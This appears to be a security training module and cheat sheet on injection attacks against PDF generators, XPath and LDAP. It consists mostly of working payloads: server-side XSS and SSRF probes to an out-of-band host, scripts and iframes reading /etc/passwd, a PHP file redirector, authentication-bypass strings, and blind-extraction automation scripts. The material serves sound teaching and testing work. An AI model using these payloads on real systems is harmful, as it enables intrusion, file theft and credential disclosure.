Injection Attacks

Exploitation of PDF Generation Vulnerabilities

Having discussed how and why web applications use PDF generation libraries, let us look at how to exploit the vulnerabilities that arise in them and the misconfigurations that cause them. All of these vulnerabilities require that user-provided content is inserted into the HTML input of the PDF generator.

JavaScript Code Execution

The first exploit we will explore is the injection of JavaScript code, since the execution of injected JavaScript code enables further attack vectors. Because the PDF generation library renders HTML input, it might execute our injected JavaScript code. Furthermore, with the PDF generation library running on the server, the payload would also be executed on the server, which is why this type of vulnerability is also called Server-Side XSS.

To demonstrate Server-Side XSS, let us take a look at a sample note-taking web application:

By clicking on the printer icon, the web application generates a printable PDF containing all our notes:

Since all the attack requires is the ability to inject HTML code, we will first test whether the PDF generation library interprets the HTML code we provide. To do so, we create a new note whose body contains a simple bold tag as our HTML payload:

Since the web application correctly escapes the HTML payload, the text between the tags has not become bold. Thus, the web application is secure against classical XSS attacks. However, if we generate a PDF, we can see that the text between the tags has become bold in the note's body, indicating that the PDF generation library is vulnerable to HTML injection and potentially Server-Side XSS:

In the second step, we need to verify whether the server executes injected JavaScript code. We can use a payload similar to the following:

<script>document.write('test1')</script>

After generating a PDF, we can see the string test1 in the PDF. Thus, the backend executed our injected JavaScript code and wrote the string to the DOM before generating the PDF.
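One caveat with a literal marker such as test1 is that it also shows up in the PDF when the payload is merely printed as escaped text. The following is a minimal sketch of a probe that avoids this by concatenating the marker at runtime. The helper names are hypothetical, and pdfText is assumed to be the text extracted from the generated PDF with any PDF-to-text tool.

```javascript
// Hypothetical helpers; the names and the marker value are illustrative.
function buildExecutionProbe(marker) {
  if (!/^[A-Za-z0-9]{2,}$/.test(marker)) {
    throw new Error("marker must be at least two alphanumeric characters");
  }
  // Split the marker so the joined string never appears in the payload itself.
  const mid = Math.ceil(marker.length / 2);
  const left = marker.slice(0, mid);
  const right = marker.slice(mid);
  return `<script>document.write('${left}'+'${right}')</script>`;
}

// pdfText is assumed to be the text extracted from the generated PDF.
function probeWasExecuted(pdfText, marker) {
  return pdfText.includes(marker);
}

const probe = buildExecutionProbe("test1");
console.log(probe);
```

If the joined marker appears in the PDF, the script was most likely executed rather than echoed. A random marker reduces the chance of accidental matches.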

As a simple first exploit, let us force an information disclosure that leaks a path on the web server. We can do so with the following payload:

<script>document.write(window.location)</script>

The window.location property stores the current location of the JavaScript context. Since this is a local file on the server's filesystem, it displays the local path on the server where generated PDF files are stored:

The execution of JavaScript can lead to further and more severe vulnerabilities, which we will discuss in the following sub-sections.

Server-Side Request Forgery

One of the most common vulnerabilities in combination with PDF generation is Server-Side Request Forgery (SSRF). Since HTML documents commonly load resources such as stylesheets or images from external sources, displaying an HTML document inherently requires the server to send requests to these external sources to fetch them. Since we can inject arbitrary HTML code into the PDF generator's input, we can force the server to send such a GET request to any URL we choose, including internal web applications.

We can inject many different HTML tags to force the server to send an HTTP request. For instance, we can inject an image tag pointing to a URL under our control to confirm SSRF. As an example, we are going to use the img tag with a domain from Interactsh:

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>

Similarly, we can also inject a stylesheet using the link tag:

<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2" >

Generally, the response to image and stylesheet requests is not displayed in the generated PDF, so we are left with a blind SSRF vulnerability, which limits what we can do with it. However, depending on the (mis-)configuration of the PDF generation library, we can inject other HTML elements that trigger a request and make the server display the response. An example of this is an iframe:

<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>
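When testing several input fields, it can help to give every probe a distinct path so that each incoming request can be attributed to a tag and an injection point. The sketch below generates the three payloads shown above for a given callback host. The function name, the runId parameter, and the example host are assumptions for illustration.

```javascript
// Hypothetical helper: builds one probe per tag type with a unique path.
function buildSsrfProbes(callbackHost, runId) {
  const base = `http://${callbackHost}/${encodeURIComponent(runId)}`;
  return {
    img: `<img src="${base}-img"/>`,
    link: `<link rel="stylesheet" href="${base}-link">`,
    iframe: `<iframe src="${base}-iframe"></iframe>`,
  };
}

// "callback.example" stands in for a domain under our control.
const probes = buildSsrfProbes("callback.example", "note42");
console.log(Object.values(probes).join("\n"));
```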

Injecting the three payloads and generating a PDF results in three requests to our Interactsh domain, which confirms SSRF with all three payloads:

Furthermore, looking at the generated PDF, we can see that the injected iframe contains the HTTP response sent by Interactsh:

Thus, we do not have a blind SSRF vulnerability but a regular SSRF, which is significantly more severe as it allows us to exfiltrate data more easily. For instance, we can make a request to any internal endpoint, and get the response displayed to us. As an example, we can leak data from an internal API like so:

<iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

The generated PDF contains the response from the internal API, potentially revealing sensitive information to us that we are unable to access externally:
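If the internal endpoint is not known in advance, several candidate URLs can be injected at once, one iframe each. The following sketch assumes a hypothetical list of candidates. Only the first URL comes from the example above; the others are placeholders.

```javascript
// Hypothetical helper: one iframe per candidate internal URL.
function buildInternalIframes(urls) {
  return urls
    .map((url) => `<iframe src="${new URL(url).href}" width="800" height="500"></iframe>`)
    .join("\n");
}

// Candidate URLs are assumptions for illustration, not known endpoints.
const candidates = [
  "http://127.0.0.1:8080/api/users",
  "http://127.0.0.1:8000/",
  "http://localhost:3000/",
];
const iframePayload = buildInternalIframes(candidates);
console.log(iframePayload);
```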

For more details on SSRF exploitation, check out the Server-side Attacks module.

Local File Inclusion

Another powerful vulnerability we can potentially exploit with the help of PDF generation libraries is Local File Inclusion (LFI). There are multiple HTML elements we can try to inject to read local files on the server.

With JavaScript Execution

If the server executes our injected JavaScript, we can read local files using an XMLHttpRequest and the file protocol, resulting in a payload similar to the following:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Injecting this JavaScript code, we can see the content of the passwd file in the generated PDF:

However, this is impractical for some files since copying data out of the PDF file might break it. For instance, the syntax most likely breaks if we exfiltrate an SSH key. Additionally, we cannot exfiltrate files containing binary data this way. Thus, we should base64-encode the file using the btoa function before writing it to the PDF:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(btoa(this.responseText))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>
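Note that btoa only accepts characters in the Latin-1 range, so encoding responseText may fail or corrupt data for binary files. A possible variant, assuming the rendering engine supports the arraybuffer response type, is to encode the raw bytes instead. The helper name below is hypothetical, and the sketch shows only the encoding step.

```javascript
// Convert raw bytes to base64 without decoding them as text first.
function bytesToBase64(bytes) {
  let binary = "";
  for (let i = 0; i < bytes.length; i++) {
    binary += String.fromCharCode(bytes[i]);
  }
  return btoa(binary);
}

// Inside the injected script, this would be combined with (assumption):
//   x.responseType = "arraybuffer";
//   x.onload = function () {
//     document.write(bytesToBase64(new Uint8Array(this.response)));
//   };
console.log(bytesToBase64(new Uint8Array([0, 255, 128, 10])));
```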

However, doing so creates a single long line that does not fit onto the PDF page. Typically, the PDF generation library does not insert linebreaks, so the line is cut off at the edge of the page:

We can easily modify our payload to inject linebreaks every 100 characters to ensure that it fits on the PDF page:

<script>
	function addNewlines(str) {
		var result = '';
		while (str.length > 0) {
			result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewlines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

After doing so, we can finally retrieve the file without issues. We can now copy the base64-encoded data and decode it using any tool that ignores the linebreaks in the base64-encoded input, such as CyberChef:
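As an alternative to a graphical tool, the copied text could be decoded locally. The following is a minimal sketch for Node.js that strips all whitespace before decoding. The function name is hypothetical, and the sample data is generated in place rather than taken from a real target.

```javascript
// Remove linebreaks and spaces introduced by the PDF layout, then decode.
function decodeWrappedBase64(copiedText) {
  const compact = copiedText.replace(/\s+/g, "");
  return Buffer.from(compact, "base64");
}

// Demonstration with locally generated data wrapped at 100 characters.
const original = "root:x:0:0:root:/root:/bin/bash\n".repeat(10);
const wrapped = Buffer.from(original).toString("base64").match(/.{1,100}/g).join("\n");
console.log(decodeWrappedBase64(wrapped).toString("utf8"));
```

Returning a Buffer rather than a string keeps the result usable for binary files, which can then be written to disk unchanged.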

Without JavaScript Execution

If the backend does not execute our injected JavaScript code, we must use other HTML tags to display local files. We can try the following payloads:

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500"></object>
<portal src="file:///etc/passwd" width="800" height="500"></portal>

However, doing so in our test environment only displays an empty iframe:

Fortunately, there is one more trick we can try with iframes. As discussed in the SSRF section, some PDF generation libraries display the responses to requests made by iframes, even if, as the screenshot above shows, they refuse to load local files directly. In that case, we can point the src attribute to a server under our control that redirects incoming requests to a local file. If the library is misconfigured, it follows the redirect and displays the file. We can run the following PHP script on our server to do so. It responds to every incoming request with an HTTP 302 redirect whose Location header points to a local file via the file protocol:

<?php header('Location: file://' . $_GET['url']); ?>

We can then inject the following payload, where the IP points to the server we are running the redirector script on:

<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>
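The two halves of this technique can be sketched as plain functions: one builds the iframe for a given local path, the other mirrors what the PHP script computes for the Location header. Both function names are hypothetical, and redirector.invalid is only a placeholder base used for parsing relative request URLs.

```javascript
// Builds the iframe payload; the path is URL-encoded for the query string.
function buildRedirectIframe(redirectorUrl, localPath) {
  const src = `${redirectorUrl}?url=${encodeURIComponent(localPath)}`;
  return `<iframe src="${src}" width="800" height="500"></iframe>`;
}

// Mirrors the PHP one-liner: "file://" followed by the decoded url parameter.
function redirectLocation(requestUrl) {
  const parsed = new URL(requestUrl, "http://redirector.invalid");
  const target = parsed.searchParams.get("url");
  return target === null ? null : "file://" + target;
}

console.log(buildRedirectIframe("http://172.17.0.1:8000/redirector.php", "/etc/passwd"));
console.log(redirectLocation("/redirector.php?url=%2Fetc%2Fpasswd"));
```

Note that encodeURIComponent emits uppercase hex digits (%2F), which is equivalent to the lowercase form used in the payload above.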

After doing so, the generated PDF now contains the leaked file:

For more details on LFI exploitation, check out the File Inclusion module.

Annotations

While we have already discussed how to include local files in the PDF pages, PDF files support advanced features like annotations and attachments, which we can also use to leak local files on the server. This is particularly interesting if the previously discussed payloads do not work.

For example, consider the PDF generation library mPDF, which supports annotations via the <annotation> tag. We can use annotations to append files to the generated PDF file by injecting a payload like the following:

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Looking at the generated PDF file, we can see the annotation with the attached file. Clicking on the attachment reveals the attached /etc/passwd file:

As we can see in this GitHub Issue, annotations have been disabled by default after mPDF 6.0. Thus, web applications using an outdated version of mPDF are most likely vulnerable. Since the option can still be enabled in newer versions, it is also worth testing web applications that use up-to-date mPDF versions.
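To attach several files in a single generated PDF, the annotation payload can be produced per path. The sketch below reuses the attribute values from the payload above. The function name is hypothetical, and /etc/hostname is only an illustrative second target.

```javascript
// Builds one mPDF annotation tag per file path.
function buildMpdfAnnotation(path) {
  // Reject quotes so the path cannot break out of the attribute value.
  if (path.includes('"')) {
    throw new Error("path must not contain double quotes");
  }
  return `<annotation file="${path}" content="${path}" icon="Graph" title="LFI" />`;
}

const annotations = ["/etc/passwd", "/etc/hostname"].map(buildMpdfAnnotation).join("\n");
console.log(annotations);
```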

Another PDF generation library that supports attachments is PD4ML. We can check the syntax in the documentation. As a proof-of-concept, we can use the following payload:

<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>

Again, if we look at the generated PDF file, we can see the annotation with the attached file:

Like before, the file is revealed if we click on the annotation. As we can see, it is essential to read the documentation of the specific PDF generation library used by our target web application to see if we can identify any functionality we can potentially exploit. Custom tags like pd4ml:attachment that enable access to local files are particularly interesting.

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() | //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
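The queries in the table follow from plain string concatenation. The sketch below assumes a hypothetical backend function that inserts the username and a password hash into the query unescaped. Because `and` binds more tightly than `or` in XPath, the injected predicate reads as `username='admin' or ('1'='1' and password=...)`, so the password check no longer restricts the match on the admin node.

```javascript
// Hypothetical vulnerable query construction (no escaping of user input).
function buildLoginQuery(username, passwordHash) {
  return `/users/user[username/text()='${username}' and password/text()='${passwordHash}']`;
}

const hash = "21232f297a57a5a743894a0e4a801fc3";
console.log(buildLoginQuery("admin' or '1'='1", hash));
console.log(buildLoginQuery("' or position()=1 or '", hash));
```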

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via a chain of wildcards: /*[1]
Iterate through the XML schema by increasing the indices to exfiltrate the entire document step by step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/*[1]/*)=1 and '1'='1`	`/users/user[username='invalid' or count(/*[1]/*)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`
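The length and value payloads from the table can be combined into a simple loop. The following sketch assumes a hypothetical oracle function that submits a payload as the username and returns true when the application responds positively. Here it is replaced by a local stand-in so the example runs on its own, and the alphabet is an assumption.

```javascript
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_";

function lengthPayload(expr, n) {
  return `invalid' or string-length(${expr})=${n} and '1'='1`;
}

function charPayload(expr, pos, ch) {
  return `invalid' or substring(${expr},${pos},1)='${ch}' and '1'='1`;
}

// Recovers the string value of an XPath expression one character at a time.
function exfiltrate(expr, oracle, maxLength = 64) {
  let length = -1;
  for (let n = 0; n <= maxLength; n++) {
    if (oracle(lengthPayload(expr, n))) { length = n; break; }
  }
  if (length < 0) return null;
  let value = "";
  for (let pos = 1; pos <= length; pos++) {
    const hit = [...ALPHABET].find((ch) => oracle(charPayload(expr, pos, ch)));
    if (hit === undefined) return null; // character outside the alphabet
    value += hit;
  }
  return value;
}

// Stand-in oracle for demonstration only: simulates a target value locally.
function mockOracle(payload) {
  const secret = "htb-stdnt";
  let m = payload.match(/string-length\(.*\)=(\d+) and/);
  if (m) return secret.length === Number(m[1]);
  m = payload.match(/substring\(.*,(\d+),1\)='(.)' and/);
  if (m) return secret[Number(m[1]) - 1] === m[2];
  return false;
}

console.log(exfiltrate("/users/user[1]/username", mockOracle));
```

Against a real target, the oracle would send an HTTP request and inspect the response. A linear search is used for clarity and needs up to one request per alphabet character and position.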

Time-based

Force the web application to iterate over the entire XML document once for every node it contains, so that evaluation takes measurably longer:

count((//.)[count((//.))])

Determine whether the first letter of the username is "a" based on the response time: if it is, the expensive expression is evaluated and the query takes significantly longer; otherwise, it returns quickly.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(|()())`	`(|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(|)`	`(|)`	Universal False
Wildcard	`*`	`(name=*a*)`	Matches all entries that contain a `name` attribute whose value contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=*)(userPassword=*))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin*)(userPassword=*))`
Universal True Bypass	`admin)(|(&`	`invalid)`	`(&(uid=admin)(|(&)(userPassword=invalid)))`
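As with XPath, the resulting search filters follow from unescaped concatenation. The sketch below assumes a hypothetical backend function that builds the filter from the submitted username and password.

```javascript
// Hypothetical vulnerable filter construction (no escaping of user input).
function buildSearchFilter(username, password) {
  return `(&(uid=${username})(userPassword=${password}))`;
}

console.log(buildSearchFilter("admin", "admin"));
console.log(buildSearchFilter("admin*", "*"));
console.log(buildSearchFilter("admin)(|(&", "invalid)"));
```

In the last case, the injected `(&)` is always true, so the surrounding Or clause succeeds regardless of the password value.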

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`
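The steps in the table can be automated by extending a known prefix until no further character matches. The following sketch assumes a hypothetical oracle that submits the given password pattern for the target user and returns true on a successful login. A local stand-in is used here, and the character set is an assumption that deliberately excludes LDAP special characters such as `*`, `(`, `)`, and `\`.

```javascript
const CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789@!-_";

// Extends the known prefix one character at a time using a trailing wildcard.
function bruteForcePassword(oracle, maxLength = 32) {
  let known = "";
  while (known.length < maxLength) {
    const next = [...CHARSET].find((ch) => oracle(known + ch + "*"));
    if (next === undefined) break; // no character extends the prefix
    known += next;
  }
  // Confirm the result with an exact match (no wildcard).
  return oracle(known) ? known : null;
}

// Stand-in oracle for demonstration only: simulates the wildcard match locally.
function mockLdapOracle(pattern) {
  const secret = "p@ssw0rd";
  return pattern.endsWith("*")
    ? secret.startsWith(pattern.slice(0, -1))
    : secret === pattern;
}

console.log(bruteForcePassword(mockLdapOracle));
```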

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>
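When checking many PDFs, the relevant metadata fields can be pulled out of the exiftool output programmatically. The sketch below parses only the Creator and Producer lines in the format shown above. The function name is hypothetical.

```javascript
// Extracts the Creator and Producer fields from exiftool's text output.
function parseGenerator(exiftoolOutput) {
  const fields = {};
  for (const line of exiftoolOutput.split(/\r?\n/)) {
    const m = line.match(/^(Creator|Producer)\s*:\s*(.+)$/);
    if (m) fields[m[1].toLowerCase()] = m[2].trim();
  }
  return fields;
}

const sampleOutput = [
  "Creator                         : wkhtmltopdf 0.12.6.1",
  "Producer                        : Qt 4.8.7",
].join("\n");
console.log(parseGenerator(sampleOutput));
```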

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500"></object>
<portal src="file:///etc/passwd" width="800" height="500"></portal>

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />